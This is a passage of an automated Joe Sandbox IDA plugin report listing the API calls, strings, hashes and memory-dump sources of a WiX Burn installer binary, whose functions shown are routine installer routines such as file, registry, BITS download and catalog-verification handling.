                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B515B35905219EFEB15DBA4CC44EAEBBB8FF05311F1442A9E511EB6A0EB319E10EB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00889063,000002C0,00000100), ref: 008A84F5
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00889063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008A8510
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                                                                                                                                                  • API String ID: 2664528157-4206478990
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8fef95ce4effde69ab4bccd8a2ff096ffcbacbe577d3b0432750f7b2113d683b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c860b54599d836fc1684d9c1d7afb02722ef8030f993a39369a9139fbeff5305
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fef95ce4effde69ab4bccd8a2ff096ffcbacbe577d3b0432750f7b2113d683b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F551C471A44601EFFB209F18CC85F1A7BA5FB12720F208518F965EB6D1DB70ED408B61
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A6513
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008A660A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008A6619
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3522763407-1704223933
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c56b312007dd5c8dcfbd354fc0241ca4af0991248210e2653557273881fb158
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac871857e322d334625e74bfd1450fa77bc23ecd4e3353c0e078f31034ff9f5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c56b312007dd5c8dcfbd354fc0241ca4af0991248210e2653557273881fb158
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B512772D00229BBEF12DFA48C45EEEBBB9FF09710F044165FA14E6150E7359A219BA1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869EED
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869F12
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format component id string., xrefs: 00869EF8
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869FF6
                                                                                                                                                                                                                                                                                                  • Failed to get component path: %d, xrefs: 00869F76
                                                                                                                                                                                                                                                                                                  • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A006
                                                                                                                                                                                                                                                                                                  • Failed to format product code string., xrefs: 00869F1D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-1671347822
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c071035376daeb7f6ec767630181532ffdb989fac3a0293a9cf3f3af9e5f175
                                                                                                                                                                                                                                                                                                  • Instruction ID: db013c5e0e62e0ddf1614a1c422ff4009402a35367d80d43af0f39cdbb80a3f7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c071035376daeb7f6ec767630181532ffdb989fac3a0293a9cf3f3af9e5f175
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5041CE32900119FADF25AAACCC86EAEB76CFB05320F274612F555E61D1DB319A40DB92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0086F942
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0086F94F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0086F82F
                                                                                                                                                                                                                                                                                                  • Resume, xrefs: 0086F8B6
                                                                                                                                                                                                                                                                                                  • Failed to read Resume value., xrefs: 0086F8D8
                                                                                                                                                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 0086F846
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 0086F8AB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                                                                                                                                                  • Opcode ID: 60af4fec3c9ee3b161f291c5896495ce062d473c78889e598e0946e5d16f1fff
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbca5b09c5150265b0166ad8559021c3aa5ea193254e34f42bd3ced623cd1828
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60af4fec3c9ee3b161f291c5896495ce062d473c78889e598e0946e5d16f1fff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17415B72900119FFDF129FA8E881AADBBA4FB01314F564176EA10EB352C376DE419F81
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                                                                                                                                                  • API String ID: 0-660234312
                                                                                                                                                                                                                                                                                                  • Opcode ID: 65ef62972558d8f6387adefc51e3d29c0e6d142d0b14ea8306c68319100ab6fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28af976d95505248f2c8ad290a357a5e007d2e5194535fb11d9a2a3d3af5b095
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ef62972558d8f6387adefc51e3d29c0e6d142d0b14ea8306c68319100ab6fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0531D632900129BBCF269A98CC45E9EBB7AFB81720F118251F924F62D5EB71DE40C791
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(008C0C4C,00000000,00000017,008C0C5C,?,?,00000000,00000000,?,?,?,?,?,0088DEE7,00000000,00000000), ref: 0088D8E8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBurn, xrefs: 0088D913
                                                                                                                                                                                                                                                                                                  • Failed to create IBackgroundCopyManager., xrefs: 0088D8F4
                                                                                                                                                                                                                                                                                                  • Failed to set progress timeout., xrefs: 0088D952
                                                                                                                                                                                                                                                                                                  • Failed to set BITS job to foreground., xrefs: 0088D969
                                                                                                                                                                                                                                                                                                  • Failed to set notification flags for BITS job., xrefs: 0088D93A
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job., xrefs: 0088D922
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                                                                                                                                                  • API String ID: 542301482-468763447
                                                                                                                                                                                                                                                                                                  • Opcode ID: 376e26adbc5fa9d4df2a2bbf1fffb7324c99a33361fe1abdbf5ec0f2bea9db83
                                                                                                                                                                                                                                                                                                  • Instruction ID: c423df17a3905d4a05a5829b4f9fd7da9c7d5755b0ede5e7d30cbf1082b88836
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 376e26adbc5fa9d4df2a2bbf1fffb7324c99a33361fe1abdbf5ec0f2bea9db83
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58314171A4031AEF9B15EBA9C885E7FBBF4FF48710B104169E915EB390DA34DC058B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 008A5DF8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5E05
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 008A5E4C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5E80
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 008A5EB4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                                                                                                                                                  • String ID: %ls.R$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3160720760-657863730
                                                                                                                                                                                                                                                                                                  • Opcode ID: 719f48372d50d37b436bf56093e1784b184d4f77273fd3a57bd6b3af0bfcadae
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c08030cc1e848250a8c1fdee08eb8ab691a09f99a6f2b9d24b59b34e57d5711
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 719f48372d50d37b436bf56093e1784b184d4f77273fd3a57bd6b3af0bfcadae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B631E972941625BBF7208B64CC45B6E7BA4FF02731F114215FE11EB6C1E7709E5086E1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0086E444,000000FF,00000000,00000000,0086E444,?,?,0086DBEB,?,?,?,?), ref: 0086CD89
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(E9008ABA,80000000,00000005,00000000,00000003,08000000,00000000,008653C5,?,00000000,840F01E8,14680A79,00000001,008653BD,00000000,00865489), ref: 0086C956
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00877809,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489,008654BD,00865445,?,00865445), ref: 0086C99B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get catalog local file path, xrefs: 0086C9D9
                                                                                                                                                                                                                                                                                                  • catalog.cpp, xrefs: 0086C9BC
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature: %ls, xrefs: 0086C994
                                                                                                                                                                                                                                                                                                  • Failed to find payload for catalog file., xrefs: 0086C9E0
                                                                                                                                                                                                                                                                                                  • Failed to open catalog in working path: %ls, xrefs: 0086C9C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareCreateErrorFileLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1774366664-48089280
                                                                                                                                                                                                                                                                                                  • Opcode ID: e08439d42f7407bea8880916c360b2420f9895ca14c5d05c8e0b54d54fad4c02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08911cc9da878d5d3b925d965f77717aa80c750e37eb83148ddaadff72e83b4b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e08439d42f7407bea8880916c360b2420f9895ca14c5d05c8e0b54d54fad4c02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1431D532900625BBD7219F58CC42F6ABFA4FF05720F128165BA54EB241E671AD109BD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,?,0088D642,?), ref: 0088D357
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,0088D642,?), ref: 0088D375
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D3B6
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D3CD
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0088D3D6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 0088D3F7
                                                                                                                                                                                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 0088D41C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                                                                                                                                                                  • API String ID: 2608678126-3424578679
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008A09AB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008A09B5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008A09FE
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008A0A0B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                  • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 161867955-2732225242
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869BB3
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0086A8AB,00000100,000002C0,000002C0,00000100), ref: 00869BD3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A8AB,00000100,000002C0,000002C0,00000100), ref: 00869BDE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869BBE
                                                                                                                                                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00869C4A
                                                                                                                                                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00869C0F
                                                                                                                                                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00869C34
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-2966038646
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869D64
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0086A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00869D84
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00869D8F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variable to file search path., xrefs: 00869DE7
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869D6F
                                                                                                                                                                                                                                                                                                  • Failed while searching file search: %ls, for path: %ls, xrefs: 00869DBD
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869DF3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-3425311760
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?), ref: 0087CF37
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF41
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,?,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000), ref: 0087CF7D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF87
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008769BB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008769C5
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00876A04
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00876A0E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F7EE
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0087F8FB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0087F85A
                                                                                                                                                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0087F8BA
                                                                                                                                                                                                                                                                                                  • UX denied while trying to set source on embedded payload: %ls, xrefs: 0087F870
                                                                                                                                                                                                                                                                                                  • Failed to set source path for payload., xrefs: 0087F88A
                                                                                                                                                                                                                                                                                                  • Failed to set source path for container., xrefs: 0087F8E0
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0087F808
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
